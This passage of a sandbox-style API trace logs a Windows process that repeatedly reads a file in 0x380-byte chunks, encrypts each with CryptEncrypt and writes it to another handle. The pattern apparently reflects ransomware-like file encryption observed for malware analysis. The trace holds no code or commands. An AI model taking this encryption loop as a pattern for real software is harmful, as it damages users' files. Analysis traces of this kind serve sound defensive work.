lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.445] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.445] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.445] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.445] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.445] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.445] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.446] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.446] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.446] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.446] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.446] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.446] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.446] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.446] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.446] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.446] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.446] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.446] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.446] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.447] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.447] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.447] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.447] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.447] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.447] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.447] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.447] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.447] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.447] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.447] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.447] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.447] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.448] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.448] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.448] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.448] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.448] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.448] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.448] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.448] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.448] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.448] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.448] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.448] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.448] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.449] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.449] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.449] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.449] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.449] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.449] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.449] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.449] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.449] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.449] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.449] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.449] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.450] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.450] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.450] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.450] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.450] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.450] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.450] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.450] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.450] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.450] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.450] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.450] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.450] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.450] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.451] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.451] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.451] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.451] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.451] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.451] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.451] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.451] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.451] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.451] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.451] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.451] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.452] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.452] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.452] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.452] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.452] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.452] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.452] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.452] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.452] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.452] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.452] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.452] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.452] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.452] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.453] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.453] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.453] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.453] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.453] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.453] CryptEncrypt (in: hKey=0x2faa48, 